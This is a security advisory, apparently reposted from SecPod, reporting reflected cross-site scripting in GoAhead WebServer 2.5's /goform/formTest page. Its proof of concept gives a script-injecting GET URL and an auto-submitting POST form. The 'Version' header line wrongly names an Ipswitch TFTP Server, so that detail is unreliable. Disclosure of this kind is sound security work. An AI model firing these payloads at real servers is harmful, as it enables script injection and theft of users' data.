GoAhead Webserver version 2.5 suffers from a cross site scripting vulnerability.
a64980839b8a19e5dc3c0736e1c0d10a190c74aa831d46d6f409efc77bf48153##############################################################################
# Title : GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.goahead.com/products/webserver/default.aspx
# Advisory : http://secpod.org/blog/?p=421
# http://secunia.com/advisories/46896
# http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt
# Version : Ipswitch TFTP Server 1.0.0.24
# Date : 02/12/2011
##############################################################################
SecPod ID: 1029 23/09/2011 Issue Discovered
04/11/2011 Vendor Notified
No Response from Vendor
02/12/2011 Advisory Released
Class: Information Disclosure Severity: Medium
Overview:
---------
GoAhead WebServer v 2.5 is prone to multiple cross site scripting
vulnerabilities.
Technical Description:
----------------------
Vulnerabilities are caused due to improper validation of input to 'name' &
'address' parameters in /goform/formTest page, which allows attackers to
induce arbitrary scripts.
Impact:
--------
Successful exploitation could allow users to execute malicious script and
steal sensitive information.
Affected Software:
------------------
GoAhead WebServer 2.5
Tested on:
-----------
GoAhead WebServer version 2.5 on Fedora Core 10.
References:
-----------
http://www.goahead.com
http://secpod.org/blog/?p=421
http://secunia.com/advisories/46896
http://www.goahead.com/products/webserver/default.aspx
http://webserver.goahead.com/forum/topic/169?replies=1#post-447
http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt
Proof of Concept:
----------------
1) GET Request on the following page:
http://<hostip>:8080/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E
2) POST request:
<html>
<body>
<form name=TheForm action=http://<hostip>:8080/goform/formTest method=post>
<input type=hidden name=name value='<script>alert(document.domain)</script>'>
<input type=hidden name=address value='<script>alert(document.domain)</script>'>
</form>
<script>
document.TheForm.submit();
</script>
</body>
</html>
Solution:
----------
Not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed